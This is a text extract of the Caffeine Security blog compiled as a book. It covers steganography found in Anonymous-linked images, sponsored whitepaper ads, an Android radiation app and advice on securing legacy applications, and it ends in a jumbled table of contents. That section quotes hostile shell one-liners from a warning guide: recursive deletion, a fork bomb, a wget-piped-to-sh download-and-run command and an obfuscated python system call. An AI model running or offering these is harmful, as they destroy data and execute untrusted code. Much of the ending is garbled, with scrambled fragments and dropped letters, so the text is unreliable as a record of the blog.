data is corrupt, and irretrievable. Should future attempts to extract the data be successful, I will post on the blog. The second le has a password of 15March1009. Now, heres a few questions which need to be answered, besides the obvious what is this le? - Does Anonymous know theyre distributing les with embedded data? - Is Anonymous adding this data, or is it being added by a 3rd party, using Anonymous as mules? - How long has this been going on? The le above is almost a year old. - Are there other accounts distributing steganography images? - Why did @57UN suddenly disappear? Rumors are that he/she was hacked, but was it something else? - Finally, just who is pulling the strings behind Anonymous?
197
BlogBook
3.8. August
If youd like to replicate my results, the original image le has been uploaded to [8]http://i.imgur.com/JR26qcb.jpg in case the original ([9]http://twitpic.com/bd806h) goes down. Stegdetect is freely available from [10]http://www.outguess.org/ The version of Outguess used to extract the embedded le is available for download at [11]http://www.mirrorservice.org/sites/ftp.wiretapped.net/pub /security/steganography/outguess/ Many thanks to [12]@heinbrian, [13]@phra95w17ch, and [14]@Impatient4truth for helping me locate the old version of Outguess needed to extract the le contents. Alternatively to posting a comment, you can also contact me through email: CaSecBlog <at> Gmail <dot> com. UPDATE 1: Ive received some comments stating that this might be a false positive. As such, Ive used FotoForensics to do some additional analysis. First, I located the top photo in the original image le, and ran it through [15]FotoForensics.
[16]
Next I [17]performed a FotoForensics on the Steganography image. 198

3.8. August
BlogBook
[18]
This appears to be pretty consistent with the results I previously encountered, in that the image appears to have small pixel tweaks, resulting in a higher ELA.
1. http://caffeinesecurity.blogspot.com/2013/01/anonymous-must-remove-the-mask.html 2. http://caffeinesecurity.blogspot.com/2013/01/anonymous-and-steganography-blindly.html 3. http://www.citi.umich.edu/u/provos/stego/abc.html 4. http://4.bp.blogspot.com/-ZM4698plEUk/UiAfpbE6dUI/AAAAAAAAAkE/shBxqOFB1c4/s1600/57un-id.png 5. http://1.bp.blogspot.com/-HryBYE_fgmE/UiAenLqfUjI/AAAAAAAAAj8/L61qUksQCLE/s1600/57UN-687336425.png 6. https://www.virustotal.com/en/file/bd7aca97863a678eb69475432794e4161e7999907e5f436269b14edc30249cd5/ analysis/1377835730/ 7. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/steg/687336425.txt 8. http://i.imgur.com/JR26qcb.jpg 9. http://twitpic.com/bd806h 10. http://www.outguess.org/ 11. http://www.mirrorservice.org/sites/ftp.wiretapped.net/pub/security/steganography/outguess/ 12. https://twitter.com/heinbrian 13. https://twitter.com/phra95w17ch 14. https://twitter.com/Impatient4truth 15. http://fotoforensics.com/analysis.php?id=37c1c7519c36da44e7c40ab70a3fd4a7f98af752.57822 16. http://2.bp.blogspot.com/-e0RW2pQEID8/UiC0ApUqw2I/AAAAAAAAAkU/yb7RT4Zu-uw/s1600/ff-image1.png 17. http://fotoforensics.com/analysis.php?id=2315825cc66422cc92285e6d213a018f924554df.147161 18. http://3.bp.blogspot.com/-bpiBdUM4s-U/UiC0WMSFpNI/AAAAAAAAAkc/DOM2ETOH5Es/s1600/ff-image2.png
199
BlogBook
3.9. September
3.8.22
How to Avoid the Coming Backup Crunch (2013-08-30 16:33)
[1] Dells critically acclaimed AppAssure enables IT to capture continuous backup snapshots, automate recoverability testing and ooad data deduplication/compression. As a result, businesses can successfully fulll rapidly escalating data protection requirements using minimal infrastructure and human resources allowing them to redirect resources to genuinely strategic technology initiatives. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_delb13 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_delb13
3.8.23
Dell AppAssure 5: Free Trial Download (2013-08-30 16:33)
[1] Register now to check out this free trial now. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_delb12 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_delb12
3.9
3.9.1
September
Android for the Paranoid - Radiation Alarm (2013-09-02 19:02)
I havent done an Android for the Paranoid article lately, so I was absolutely glowing when I stumbled across [1]Radiation Alarm. This nifty little app lets you know if your phone is detecting any harmful radiation. How does it do that? The science behind the app is pretty simple - if you cover your cellphone camera with 200
3.9. September
BlogBook
a dark piece of paper or tape over the cell phone, light wont pass through, but radiation will still hit the cameras CMOS censor, causing pixels to light up.
[2] My Radiation reading after calibrationA neat trick I found works well is to slip a small piece of a oppy disk inside the cameras case, so that it covers the phones camera. This way light cant pass through, and I dont have to worry about making my camera lens sticky or blurry. Best of all, the piece of oppy disk can be hidden behind the camera battery when not in use. NOTE: Using a piece of a oppy disk may generate false positives if your phone is pointed at a light source, or used in a very bright area. While I dont have a radioactive source available to me, the science behind this is sound, and reinforced by this YouTube video, which shows what a cellphone camera looks like when exposed to radiation.
[EMBED] When you install and calibrate this app for the rst time, you should be away from any known radiation sources. For example, if you live in a brick house, you should actually calibrate your app in a location away from any brick buildings. After all, brick houses do [3]give o low levels of radiation. Of course, if you live anywhere near Fukushima or Chernobyl, you might have a hard time calibrating this.
1. https://play.google.com/store/apps/details?id=eu.camdetector.radiationalarm 2. http://3.bp.blogspot.com/-O95J4v-1xCU/UiUVzMGPSRI/AAAAAAAAAkw/xbtvHhBN-0E/s1600/radiation+alarm.png 3. http://hps.org/publicinformation/ate/q9778.html
3.9.2
Eagle Bank Uses Single Sign-On to Secure Deposits and Customer Data
(2013-09-04 19:31)
201
BlogBook
3.9. September
[1] When a security audit revealed the banks password-protection vulnerability, Eagle Bank, a mutual bank with over $430 million in assets, turned to Imprivata OneSign Single Sign-On (SSO) technology. If you are an IT professional in banking or nancial services, then this case study that details how OneSign alleviated Eagle Banks password problems and increased system security is a must read. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_impr22 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_impr22
3.9.3
How Single Sign-On Helped Republic Bank Relieve Password Headaches

(2013-09-04 19:31)
[1] Republic Banks employees were struggling to remember the complex passwords required to access the banks critical software applications. If you are an IT professional in banking or nancial services, then youll want to watch this recorded webinar. In it, youll hear from a security expert at Republic Bank who shares experiences on how his bank used Imprivata OneSign Single Sign-On technology to reduce the number of passwords and log-ins required of employees, mitigate the risks of password sharing, and ensure compliance with industry regulations. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_impr24 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_impr24
3.9.4
Exchange ActiveSync and BYOD: Potential for Disaster or Foundation for Mobile Success (2013-09-05 13:32)
3.9. September
BlogBook
[1] Wednesday, September 11th @ 2 pm ET / 11 am PT Join Exchange MVP Tony Redmond and Brian Reed of BoxTone to learn:
Key challenges facing Exchange organizations in an increasingly mobile world Approaches to avoid pitfalls and promote mobile success Strategies to manage the complexity of BYOD and device diversity [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_wind01 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_wind01
3.9.5
Legacy Applications - The Swiss Cheese of Security (2013-09-08 11:38)
Almost every organization has them... Theres that one app which someone in your organization cant live without. Its probably from back in the 1990s, and the developer no longer supports it, if theyre even in business anymore. Sometimes the app was never replaced simply due to lack of funding; other times a replacement simply doesnt exist. To make matters worse, this app probably requires additional unsupported software, such as Java 1.4.2 or even Microsoft Java Virtual Machine. Bonus points if the app also requires an unsupported operating system, such as Windows 2000. As a security practitioner, what can you do to help secure these applications which introduce gaping holes into your organizations network? Do some research, and identify multiple plans of attack to address the Swiss Cheese. Present these plans to management, and get their buy-in. Remember, any attempts to secure these legacy applications will inconvenience their users, so management approval is a must. 1) Investigate alternatives - Its very possible that someone else has run into the same problem as you, and has created a solution. This wont be without a little bit of work, however. For example, if your custom app requires an Oracle database backend, consider migrating to [1]Postgres, which is Free Open Source Software. 2) Air Gapping - If possible, disconnect your legacy application from the network completely, and require any data to be transferred to/from the application be done so through removable media. 3) Isolation - If your legacy application must have network access, place the system in an isolated VLAN. Principle of least privilege applies - only give the system access to the IP addresses and ports which it must absolutely have to function. 4) Implement Intrusion Prevention - Network Intrusion Prevention and Host Intrusion Prevention systems
203
BlogBook
3.9. September
can be used to extend the life of unsupported applications. Often these systems will be able to catch attempts to exploit the application, such as buer overows or cross-site-scripting attacks. 5) Risk Based Decision - Finally, if the legacy application isnt being removed from your organization, a riskbased-decision memo should be signed by upper management. Ensure that management clearly understands the risks involved with continuing to use the unsupported software, including attack vectors, mitigations in place, and the likely results of a compromise. This way management agrees to assume the risk associated with continuing to use the application, and cant claim ignorance should the application ever be compromised in the future. Do you have any additional suggestions for addressing legacy applications? If so, please share!
1. http://wiki.postgresql.org/wiki/Oracle_to_Postgres_Conversion
3.9.6
Staying Secure in a Cloudy World (2013-09-16 17:32)
[1] Organizations that deploy public, private or hybrid cloud infrastructures which today is virtually all of them must mitigate inherent security risks while also maintaining compliance with industry and government regulations. This paper contains three simple steps for maintaining visibility and control when moving to the cloud and explains how NetIQ can help with each:
Reduce risk Improve threat response Reduce the compliance eort Fortunately, advances in information security and compliance management technologies have empowered cloud-computing users to reduce risk, improve threat response and drastically reduce the eort needed for compliance management. And NetIQ is leading the charge. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_neti22 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_neti22
3.9.7
Real-Time Security Intelligence for Greater Visibility and Information-Asset Protection (2013-09-16 17:32)
3.9. September
BlogBook
[1] Compliance mandates are changing, and collecting logs is not enough. To reduce the risk of audit failure, you must be able to produce reports that both help you review anomalies, and demonstrate to ever-more attentive auditors that youre doing so. In this white paper:
Get the security intelligence you need to meet compliance requirements. Make better use of time and resources with automated processes. Satisfy your internal audiences with graphical reporting that lets them understand your organizations security posture. [2]Request Free!
3.9.8
Identity and Access Governance:

(2013-09-16 17:32)
Bringing Business and IT Together
[1] IT professionals and executives who use identity management and access governance systems typically have dierent objectives and technology backgrounds. Converging the systems makes sense, but it must be robust to meet ITs demands and simple for non-IT professionals to manage. This white paper covers:
Primary factors driving the growth of the identity and access governance (IAG) marketplace. Key elements for eective IAG solutions. What you should ask when selecting a vendor.
205
BlogBook [2]Request Free!

3.9. September
3.9.9
Security and HIPAA Compliance: Meeting the Challenge of Securing Protected Health Information (2013-09-16 18:47)
[1] As the need to ensure the security of sensitive health information grows, security and compliance teams must look to more integrated approaches to both reduce risk and enable streamlined and ecient user workows. This white paper provides insight into:
The most important elements of securing sensitive health information Meeting HIPAA compliance requirements in a scalable and cost-eective way The HITECH Act, which addresses the privacy and security concerns associated with the electronic transmission of health information By focusing eorts in the key areas of controlling access, monitoring healthcare personnel with broad privileges (privileged users) and managing privilege delegation, organizations can reduce the net risk to themselves and sensitive health information, which in turn eases compliance with standards such as HIPAA and the HITECH Act. [2]Request Free!
3.9.10
Top 10 Security Best Practices for Small Business (2013-09-19 14:32)
[1] 206
3.9. September
BlogBook
Cybercrime is increasing at epidemic proportions and small to medium businesses have turned into key targets for cybercriminals. The Wall Street Journal recently stated that small businesses rarely recover from a cyberattack but there are some very simple steps you can take to protect your business. Download this informative slideshow and improve your security today. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_chec08 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_chec08
3.9.11
Tricks of the Trade - New Whitepaper Available (Malware evading Intrusion Detection) (2013-09-21 13:58)
[1] Im happy to announce that Ive completed my whitepaper on how malware attempts to evade detection by intrusion detection systems. In this paper I take a look at how malware attempts to evade detection by both network-based and host-based intrusion detection systems through some very clever techniques. All of the malware featured was captured by my own personal honeypots. Please view or download the paper over at Scribd: [2]Tricks of the Trade - How Malware Authors Cover Their Tracks
1. http://3.bp.blogspot.com/-cvtCnFHEdTs/Uj3dhOF1wzI/AAAAAAAAAlM/CNfxD98JpaM/s1600/tricks.jpg 2. http://www.scribd.com/doc/169870648/Tricks-of-the-Trade-%E2%80%93-How-Malware-Authors-Cover-Their-Tracks
207
BlogBook v0.4, EX 2 & GNU/Linux. http://www.blogbooker.com

A L T
Edited: September 22, 2013

Caffeine Security Full Blog Contents

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Caffeine Security Full Blog Contents

Uploaded by

Copyright:

Available Formats

From Blog to Book.

November . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.1 The Lottery Scam - Jeanis Story (2011-11-07 22:33) . . . . . . . . . . . . . . . .

BlogBook 1.3.2 1.3.3 1.3.4 1.4

Following the Trail: Determining the Origins of Linux/Bckdr-RKC (2011-12-31 12:10)

Threat Watch updated to include Malware Indicator Trends (2012-11-13 12:16) .

CONTENTS 2.11.3 2.11.4 2.11.5

108 108 109 109 109 111 113 114 117

Anonymous OpIsrael - Prelude to a Hamas Attack? (2013-03-16 16:43) . . . . . .

BlogBook 3.3.6 3.3.7 3.4

Anonymous #OpPetrol Most Epic #Fail Yet - Full Analysis Of Results

CONTENTS 3.9.9 3.9.10 3.9.11

A little note on Password Strength (2011-09-20 20:35)

Emergency Adobe Flash Patch Today (2011-09-21 02:01)

Research Project: To Catch a Scammer (2011-09-22 02:01)

Abandoning the Client-Server Model (2011-09-22 22:03)

Read more at [1]PCMag

Introducing the Scam Fund! (2011-09-24 01:53)

Research Project - Project Picnic Basket (2011-09-24 12:32)

Password Cracker Analysis (2011-09-25 14:39)

More password analysis (2011-09-26 18:18)

Solar Activity could cause severe issues (2011-09-26 22:23)

Listening to a Password Cracker (2011-09-27 21:26)

Guide to Malicious Linux/Unix Commands (2011-09-30 12:21)

BlogBook rm -rf . rm -rf *

In Bourne-ish shells (like Bash): :(){:|:&};:

1.1. September fork while fork

or wget http://some_place/some_file -O- | sh

python -c import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))

Ducati Motorcycle Default Password Vulnerability. (2011-09-30 12:42)

A look at a simple SSH probe and password crack (2011-10-05 22:05)

Whats in a hackers toolkit? (2011-10-11 20:45)

Netscape 8? Really? (2011-10-12 17:00)

Mystery Malware Examined (2011-10-12 18:54)

#include "client.c.h" char *ssh_get_banner( SSH_SESSION *session )

A look at the various advance fee fraud methods... (2011-10-13 02:00)

Anywhere between $1,000,000 and $5,000,000 USD. How it works:

BlogBook 4. Victim contacts fake bank/agency to claim winnings

Oil tycoon Investment banker Common award amount:

BUSTED! (2011-10-17 18:22)

11/16/11 is American Internet Censorship Day (2011-11-16 18:46)

If ET were a Hacker, he would just try to phone home... (2011-11-17 18:03)

Protecting electronic devices from an EMP attack (2011-11-21 07:26)

[5] Related Reading: [6]The (VERY) Unocial Guide to Facebook Privacy

Free IT Security Magazines and Whitepapers from TradePub (2011-12-05 17:51)

Misuse of Your Personal Information and Google Alerts (2011-12-08 19:49)

The (VERY) Unocial Guide To Facebook Privacy (2011-12-11 11:35)

Introducing Caeine Security Secure Firefox! (2011-12-11 12:49)

Mystery Malware: An echo powered DDoS Script? (2011-12-12 19:33)

echo 2e61e112030709378914f8280fd09f62e 61e112030709378914f8280fd09f62e61e11203 0709378914f8280fd09f62e61e1120307093789

BlogBook 14f8280fd09f62e61e112030709378914f8280f d09f6 And ends with the following lines:

Free Subscription to Security Magazine (2011-12-12 20:02)

and a Computer Virus - Lessons to be Learned

Holiday Computer Essentials CD (2011-12-15 19:37)

Insider Threats and Data Loss Prevention (2011-12-16 19:37)

New Resource: Threat Watch (2011-12-19 18:12)

Linux/Bckdr-RKC Initial Analysis (2011-12-21 23:32)

Protect Your Family While Using Social Media (2011-12-22 19:57)

Linux/Bckdr-RKC: A New Variant Appears (2011-12-26 10:18)

Woman Gives Birth to Three Plates (2011-12-27 12:59)

Just saw this email in the funsec mailing list:

How to Get a Cyber Security or Information Assurance Job (2011-12-27 19:37)

[7]ISC2 CISSP Practice Exam 48

1.4. December Conclusion

Anonymous: Friend or Foe? (2011-12-27 22:59)

#include "client.c.h" char ssh_get_banner( SSH_SESSION session )